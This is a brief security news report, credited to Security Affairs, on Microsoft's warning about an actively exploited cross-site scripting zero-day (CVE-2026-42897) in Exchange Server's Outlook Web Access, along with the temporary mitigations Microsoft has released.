Microsoft warns of active exploitation of new Exchange Server zero-day vulnerability

As reported by Security Affairs, Microsoft has issued a warning regarding the active exploitation of a previously unknown zero-day vulnerability affecting Microsoft Exchange Server, identified as CVE-2026-42897.

The vulnerability, a cross-site scripting flaw with a CVSS score of 8.1, specifically impacts Outlook Web Access (OWA). Attackers can exploit this by sending a specially crafted email that, when opened in OWA under certain conditions, executes malicious JavaScript. This allows for network-based spoofing and can provide attackers with a direct path into an organization's internal communications, credentials, and business workflows. Microsoft confirmed active exploitation in the wild but has not detailed specific attacks. While a permanent fix is pending, temporary mitigation measures have been released and administrators are urged to apply them immediately.

The exploitation of Exchange Server zero-days is particularly dangerous due to the central role of email systems in organizations and the frequent internet-facing nature of many Exchange servers. This flaw surfaced shortly after Microsoft's May 2026 Patch Tuesday, which addressed 138 vulnerabilities.

Source: Security Affairs